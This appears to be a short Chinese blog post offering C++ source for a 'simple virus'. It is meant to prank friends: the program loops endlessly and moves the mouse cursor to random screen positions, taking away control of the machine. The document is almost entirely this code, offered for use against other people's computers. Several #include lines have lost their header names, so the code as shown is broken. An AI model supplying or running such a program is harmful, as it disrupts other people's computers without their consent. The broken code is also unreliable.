Bootstrap

c++简易病毒(附代码)

闲的没事做了个病毒,可以用来整朋友,在Dev-c++上可以运行,附代码
#include<windows.h>
#include
#include
#include
using namespace std;
int main()
{
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
srand(time(0));
while(1)SetCursorPos(rand()%x,rand()%y);
return 0;
}`

;